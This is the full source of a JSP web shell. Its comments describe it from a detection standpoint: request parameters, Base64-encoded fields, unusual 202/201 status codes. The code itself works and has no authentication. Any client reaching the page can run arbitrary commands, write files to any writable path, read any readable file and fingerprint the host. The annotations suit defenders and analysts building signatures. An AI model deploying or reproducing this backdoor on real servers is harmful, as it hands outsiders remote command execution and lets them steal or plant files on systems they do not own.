<%@ page import="java.util.*,java.io.*,java.nio.file.*,java.util.regex.Pattern"%>
<%@ page trimDirectiveWhitespaces="true" %>
<%!
/**
 * Decodes a Base64 string into text using the platform default charset
 * (no charset is given to the String constructor, so the result is JVM-dependent).
 * This helper decodes the chdir, b64_env, b64_cmd, b64_filename and b64_orig
 * parameters, so none of those values appear in clear text in access logs;
 * detection on this traffic has to decode the parameters first.
 *
 * @param b64 Base64 text in the basic (RFC 4648 standard-alphabet) form accepted by java.util.Base64
 * @return the decoded bytes as a String
 * @throws IOException declared only; the visible body throws none. A malformed
 *         value makes decode() throw IllegalArgumentException instead, which the
 *         page-level try/catch does not handle.
 */
public String b64d(String b64) throws IOException
{
byte[] tmp = Base64.getDecoder().decode(b64);
return new String(tmp);
}
/**
 * Writes a string to the response as Base64 (platform default charset for the
 * byte conversion), optionally followed by a ":" field separator.
 * Every response field this page emits goes through this or an equivalent inline
 * encode, so the response body is a sequence of colon-separated Base64 fields
 * rather than readable text — a useful signature for response-side inspection.
 *
 * @param out  the JSP writer for the current response
 * @param data plain text to encode
 * @param sep  when true, a ":" is printed after the encoded field
 * @throws IOException if the writer fails
 */
public void pb64(JspWriter out, String data, boolean sep) throws IOException
{
byte[] tmp = data.getBytes();
out.print(new String(Base64.getEncoder().encode(tmp)));
if (sep)
out.print(":");
}
/**
 * Reads a stream to end-of-stream into a byte array, 4096 bytes at a time.
 * Only the "cmd" branch of process() calls it, on the child process's combined
 * stdout/stderr pipe. The stream is not closed here; the caller owns it.
 *
 * @param stream source to drain
 * @return all bytes read until read() returns -1 (empty array for an empty stream)
 * @throws IOException propagated from stream.read()
 */
public byte[] readInputStream(InputStream stream) throws IOException
{
int readCount;
byte[] buffer = new byte[4096];
ByteArrayOutputStream bos = new ByteArrayOutputStream();
while(( readCount = stream.read(buffer, 0, buffer.length)) != -1)
{
bos.write(buffer, 0, readCount);
}
return bos.toByteArray();
}
/**
 * Dispatches one request of this web shell. There is no authentication, token
 * or origin check anywhere in the visible code: any client that can reach the
 * page can drive every branch below. From a defender's view the request shape
 * is the detection surface — the parameter names (chdir, b64_env, action,
 * b64_cmd, b64_upload, b64_filename, b64_orig), the literal "<@:SEP:@>" argument
 * separator, and the HTTP 202 status used as an application-level error code.
 *
 * Request parameters (all Base64 unless noted):
 *   chdir        working directory for the "cmd" action; 202 + error text if not a directory
 *   b64_env      ":"-separated list of Base64 "NAME=VALUE" pairs added to the child environment
 *   action       plain text: "init", "cmd", "upload" or "download"; unknown values fall through
 *   b64_cmd      argument vector for "cmd", joined by the literal token "<@:SEP:@>"
 *   b64_upload   raw file content for "upload" (decoded directly, not via b64d)
 *   b64_filename target path for "upload" / source path for "download"
 *   b64_orig     file name appended when the "upload" target is an existing directory
 *
 * Response: colon-separated Base64 fields (see pb64), always ending with the
 * absolute path of the working directory.
 *
 * @param out      JSP writer for the response
 * @param request  current request; every parameter is read unvalidated
 * @param response used only to set status 202 on a failed chdir
 * @throws IOException          from file, process or writer operations
 * @throws InterruptedException from Process.waitFor()
 */
public void process(JspWriter out, HttpServletRequest request, HttpServletResponse response) throws IOException, InterruptedException
{
byte[] content;
String filename;
// Default working directory is the JVM's current directory, not the webapp root.
File cwd = new File(".");
Map<String, String> env = new HashMap<String,String>();
if (request.getParameter("chdir") != null)
{
cwd = new File(b64d(request.getParameter("chdir")));
if( !cwd.isDirectory() ) {
// Non-standard use of 202 as an error signal; the body still carries the path.
response.setStatus(202);
pb64(out, "Error: Unable to change directory to " + cwd.getAbsoluteFile(), false);
return;
}
}
if (request.getParameter("b64_env") != null)
{
for(String b64 : request.getParameter("b64_env").split(":"))
{
// split("=") keeps all pieces, so a value that itself contains "=" yields
// length > 2 and the entry is silently dropped by the check below.
String[] envvar = b64d(b64).split("=");
if (envvar.length == 2)
env.put(envvar[0], envvar[1]);
}
}
if (request.getParameter("action") != null ) {
switch (request.getParameter("action"))
{
case "init":
// Fingerprint reply: path separator, "jsp" (shell flavour), OS user, hostname.
// The "jsp" literal and this four-field layout are a stable response signature.
pb64(out, File.separator, true);
pb64(out, "jsp", true);
pb64(out, System.getProperty("user.name"), true);
pb64(out, java.net.InetAddress.getLocalHost().getHostName(), true);
break;
case "cmd":
// b64_cmd missing -> getParameter() returns null -> NullPointerException in decode(),
// which the page-level catch (IOException only) does not handle.
String[] command = b64d(request.getParameter("b64_cmd")).split("<@:SEP:@>");
// Arguments are passed as a vector (no shell), so process-creation telemetry
// will show the web server's JVM as the direct parent of the executed program.
ProcessBuilder builder = new ProcessBuilder(command);
builder.directory(cwd);
builder.environment().putAll(env);
// stderr is merged into stdout; the response carries one combined stream.
builder.redirectErrorStream(true);
Process proc = builder.start();
proc.waitFor();
content = readInputStream(proc.getInputStream());
out.print(new String(Base64.getEncoder().encode(content)));
out.print(":");
break;
case "upload":
content = Base64.getDecoder().decode(request.getParameter("b64_upload"));
filename = b64d(request.getParameter("b64_filename"));
if (new File(filename).isDirectory())
filename += File.separator + b64d(request.getParameter("b64_orig"));
// No base-directory check: the path is written wherever the server process
// has permission. Note that Paths.get() resolves relative names against the
// JVM working directory, not against the cwd variable above.
Files.write(Paths.get(filename), content);
break;
case "download":
filename = b64d(request.getParameter("b64_filename"));
// Same as upload: any readable path, resolved independently of cwd.
content = Files.readAllBytes(Paths.get(filename));
out.print(new String(Base64.getEncoder().encode(content)));
out.print(":");
break;
}
}
// Trailing field of every successful response: the absolute working directory.
pb64(out, cwd.getAbsoluteFile().toString(), false);
}
%>
<%
// The "pattern" parameter is echoed verbatim (no encoding) before and after the
// payload so a client can locate the Base64 fields between two copies of a
// marker it chose. It is reflected unescaped, and a request without it prints
// the literal text "null" twice — both are observable response-side indicators.
out.print(request.getParameter("pattern"));
try {
process(out, request, response);
} catch (IOException e) {
// 201 is used here as an error signal, not as a "Created" status; the body
// leaks the exception class and message to the client.
response.setStatus(201);
out.print("Caught unexpected " + e.getClass().getName() + ": " + e.getMessage());
}
// NOTE(review): process() also declares InterruptedException, which this try does
// not catch; whether the container's generated servlet tolerates that depends on
// its throws clause — confirm against the target container. Runtime exceptions
// (e.g. a malformed Base64 value) are likewise uncaught here.
out.print(request.getParameter("pattern"));
%>